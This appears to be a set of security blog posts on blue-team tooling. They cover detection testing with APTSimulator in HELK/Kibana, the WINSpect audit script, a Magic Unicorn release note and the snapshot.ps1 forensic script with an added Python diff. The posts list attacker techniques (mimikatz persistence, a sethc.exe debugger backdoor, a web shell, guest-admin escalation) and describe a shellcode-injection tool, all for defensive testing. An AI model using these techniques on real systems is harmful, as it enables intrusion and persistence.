This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2:
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executes nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline,, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. That was not good enough to be particularly useful, so I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month, I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well, there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Toolsmith Tidbit: Windows Auditing with WINSpect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a PowerShell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.

The script confirms that it's running with admin rights, checks PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Windows Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.

WINSpect then confirmed that UAC was enabled, and that it should notify me only when apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.

WINSpect wrapped up with a quick check of configurable services, SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all, I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enabled...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts are on the to-do list.
Cheers...until next time.

Toolsmith Release Advisory: Magic Unicorn v2.8

David Kennedy and the TrustedSec crew have released Magic Unicorn v2.8.
Magic Unicorn is "a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory, based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by Dave and Josh Kelly at Defcon 18."

Version 2.8:
  • shortens length and obfuscation of unicorn command
  • removes direct -ec from PowerShell command
"Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system."

Toolsmith – GSE Edition: snapshot.ps1

I just spent a fair bit of time preparing to take the GIAC Security Expert exam as part of the requirement to recertify every four years. I first took the exam in 2012, and I will tell you, for me, one third of the curriculum is a "use it or lose it" scenario. The GSE exam covers GSEC, GCIH, and GCIA. As my daily duties have migrated over the years from analyst to leadership, I had to "relearn" my packet analysis fu. Thank goodness for the Packetrix VM and the SANS 503 exercises workbook, offsets, flags, and fragments, oh my! All went well, mission accomplished, I'm renewed through October 2020 and still GSE #52, but spending weeks with my nose in the 18 course books reminded me of some of the great tools described therein. As a result, this is the first of a series on some of those tools, their value, and use case scenarios.
I'll begin with snapshot.ps1. It's actually part of the download package for SEC505: Securing Windows and PowerShell Automation, but is discussed as part of the GCIH curriculum. In essence, snapshot.ps1 represents one script to encapsulate activities specific to the SANS Intrusion Discovery Cheat Sheet for Windows.
The script comes courtesy of Jason Fossen, the SEC505 author, and can be found in the Day 5-IPSec folder of the course download package. The script "dumps a vast amount of configuration data for the sake of auditing and forensics analysis" and allows you to "compare snapshot files created at different times to extract differences."
To use snapshot.ps1, place the script into a directory where it is safe to create a subdirectory, as the script creates such a directory named for the computer, then writes a variety of files containing system configuration data. Run snapshot.ps1 with administrative privileges.
The script runs on Windows 7, Server 2008, and newer Windows operating systems (I ran it on Windows 10 Redstone 2) and requires PowerShell 3.0 or later. You also need to have autorunsc.exe and sha256deep.exe in your PATH if you want to dump what programs are configured to start up automatically when your system boots and you log in, as well as run SHA256 file hashes.
That said, if you must make the script run faster, and I mean A LOT FASTER, leave file hashing disabled at the end of the snapshot.ps1 for a 90% reduction in run time.
However, Jason points out that this is one of the most useful aspects of the script for identifying adversarial activity. He also points out that snapshot.ps1 is a starter script; you can and should add more commands. As an example, referring back to toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics, after importing PowerForensics, you could add something like Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge "12/30/2015" -and $_.Date -le "01/04/2016" } | WriteOut -FileName Timeline which would give you a file system timeline between 12/30/2015 and 01/04/2016.
But wait, there's more! Want to get autoruns without needing autorunsc.exe? Download @p0w3rsh3ll's AutoRuns module, run Import-Module AutoRuns.psm1, then Get-Command -Module AutoRuns to be sure the module is on board, and finally comment out autorunsc.exe -accepteula -a -c | Out-File -FilePath AutoRuns.csv then add Get-PSAutorun | WriteOut -FileName AutoRuns.
It's then as simple as running .\Snapshot.ps1 and watching your computer-named directory populate, 0V3RW4TCH-2016-10-31-9-7 in my case, per Figure 1.

Figure 1: Snapshot.ps1 run
Most result files are written in machine-readable XML, CSV, and TXT, as well as REG files generated by the registry exports via reg.exe.
A great example of a results file is spawned via dir -Path c:\ -Hidden -Recurse -ErrorAction SilentlyContinue | Select-Object FullName,Length,Mode,CreationTime,LastAccessTime,LastWriteTime | Export-Csv -Path FileSystem-Hidden-Files.csv. The resulting CSV is like a journey down evil memory lane, where all the nuggets I've tested in the past leave artifacts. This would be EXACTLY what you would be looking for under real response scenarios, as seen in Figure 2.

Figure 2: Snapshot.ps1 grabs hidden files
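Much of the value of these result files comes from comparing runs taken at different times. As an added example (not part of Jason Fossen's script), the following Python compares two FileSystem-Hidden-Files.csv exports and reports added, removed, and changed hidden files; the sample rows are constructed, and ignoring LastAccessTime is an assumption made here to cut noise.

```python
import csv

# Constructed snapshots in the shape Export-Csv writes for the command above.
# Windows PowerShell emits a leading "#TYPE" line unless -NoTypeInformation is set.
BASELINE = r'''#TYPE Selected.System.IO.FileInfo
"FullName","Length","Mode","CreationTime","LastAccessTime","LastWriteTime"
"C:\ProgramData\app\cache.dat","2048","-a-h--","10/1/2016 8:00:00 AM","10/30/2016 8:00:00 AM","10/1/2016 8:00:00 AM"
"C:\Users\Public\desktop.ini","174","-a-hs-","7/16/2016 4:47:00 AM","7/16/2016 4:47:00 AM","7/16/2016 4:47:00 AM"
"C:\Temp\old.tmp","10","-a-h--","9/1/2016 1:00:00 PM","9/1/2016 1:00:00 PM","9/1/2016 1:00:00 PM"
'''
LATER = r'''#TYPE Selected.System.IO.FileInfo
"FullName","Length","Mode","CreationTime","LastAccessTime","LastWriteTime"
"C:\ProgramData\app\cache.dat","4096","-a-h--","10/1/2016 8:00:00 AM","10/31/2016 9:07:00 AM","10/31/2016 9:05:00 AM"
"C:\USERS\Public\desktop.ini","174","-a-hs-","7/16/2016 4:47:00 AM","10/31/2016 9:07:00 AM","7/16/2016 4:47:00 AM"
"C:\TMP\stage.bin","51200","-a-h--","10/31/2016 9:01:00 AM","10/31/2016 9:01:00 AM","10/31/2016 9:01:00 AM"
'''


def load(text):
    """Map lower-cased FullName -> row, skipping the '#TYPE' line if present."""
    lines = [line for line in text.splitlines() if not line.startswith("#TYPE")]
    # Windows paths are case-insensitive, so compare on a lower-cased key.
    return {row["FullName"].lower(): row for row in csv.DictReader(lines)}


def diff(old_text, new_text, fields=("Length", "CreationTime", "LastWriteTime")):
    """Return (added, removed, changed) between two hidden-file snapshots."""
    old, new = load(old_text), load(new_text)
    added = sorted(new[k]["FullName"] for k in new.keys() - old.keys())
    removed = sorted(old[k]["FullName"] for k in old.keys() - new.keys())
    changed = {}
    for k in old.keys() & new.keys():
        delta = {f: (old[k][f], new[k][f]) for f in fields if old[k][f] != new[k][f]}
        if delta:
            changed[new[k]["FullName"]] = delta
    return added, removed, changed


if __name__ == "__main__":
    added, removed, changed = diff(BASELINE, LATER)
    print("added:", added)
    print("removed:", removed)
    print("changed:", changed)
```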
Sure, there are bunches of related DFIR collection scripts, but I really like this one, and plan to tweak it further. Good work from Jason, and just one of many reasons to consider taking SEC505, or pursuing your GSE!
Cheers...until next time.